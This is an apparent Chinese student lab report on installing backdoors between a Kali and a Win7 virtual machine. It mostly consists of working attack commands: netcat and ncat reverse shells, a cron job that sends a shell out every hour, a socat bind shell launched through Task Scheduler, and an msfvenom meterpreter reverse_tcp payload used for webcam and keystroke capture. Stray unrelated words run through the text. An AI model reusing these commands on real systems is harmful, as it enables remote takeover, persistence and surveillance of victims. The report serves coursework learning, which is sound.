(1)例举你能想到的一个后门进入到你系统中的可能方式?html
(2)例举你知道的后门如何启动起来(win及linux)的方式?linux
(3)Meterpreter有哪些给你映像深入的功能?shell
(4)如何发现本身有系统有没有被安装后门?vim
在kali虚拟机中输入ifconfig
,在WIN7虚拟机中输入ipconfig
,找到两个虚拟机的ip地址(通常在同一网段),在VMware Station中打开虚拟机
->设置
->网络适配器
->NAT模式
能够在没有联网的时候仍然ping通同一主机上的两台虚拟机。windows
kali端控制Win7端网络
1. kali:nc -l -p 端口号 2. Win7:ncat.exe -e cmd.exe kali主机ip 端口号//反向链接kali主机,端口号为kali主机的端口号 3. kali:能够输入Windows命令
1. Win7:ncat.exe -l -p 端口号 2. Kali:nc kali主机ip 端口号 -e /bin/sh//反向链接Win7主机,端口号为Win7主机的端口号
经过ncat传字符串
一个主机开启端口监听,另外一个主机链接到这个端口,不用连接到cmd.exe或是shell能够实现两台主机的数据传输
tcp
- Win7:ncat.exe -l -p 端口号 - kali:crontab -e //指令编辑一条定时任务 - kali:选择vim.basic - kali:时间(分) * * * * /bin/netcat 192.168.1.200 5215 -e /bin/sh//在最后一行添加,时间是指每一小时执行一次的分钟数,按照本身的kali虚拟机的时间设定,否则可能要等好久才能获得shell - Win7:获得shell执行linux指令
socat [options] address address
- 打开Win7虚拟机中的控制面板,选择查看方式为:大图标;找到:管理工具,打开;找到:任务计划程序,打开; - 在右侧一栏中选择:建立任务,打开; - 填写任务名称;新建触发器,选择开始任务时间为:工做站锁定时,便于操做; - 新建操做,选择启动的程序为socat.exe,参数填为:tcp-listen:端口号 exec:cmd.exe,pty,stderr,这一操做的含义是把cmd.exe绑定到端口号,同时把cmd.exe的stderr重定向到stdout上 - 用快捷键Windows+L锁定虚拟机,任务启动 - 在kali虚拟机终端输入socat - tcp:192.168.1.200:端口号,能够控制Win7的cmd。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.230.144 LPORT=5203 -f exe > dkx20155203_backdoor.exe
注意这里的地址是发起攻击主机的地址,也就是kali的地址,生成文件后,会有文件大小的相关说明。1. Win7:ncat.exe -l > dkx20155203_backdoor.exe 2. kali:nc 192.168.230.141 5203 < dkx_20155203_backdoor.exe//这里的地址是Win7的地址
接收到要检查文件大小,不幸运的时候有多是0KB,后面就什么也干不了。工具
msfconsole
指令进入msf控制台,设置LPORT、LHOST军与生成可执行文件相同,设置payload。执行exploit如图所示:
.net
若是链接摄像头出错,切换到WIN7虚拟机(VMware Station)点击虚拟机->可移动设备->xxx Camera->链接
3d
这个击键记录颇有趣,由于若是我是复制的它也记录不了,懒人无敌~
解决办法:
试了五六次,成功了!
(5)可选加份内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹链接Shell(1分)加份内容一并写入本实验报告。
有趣的实验体验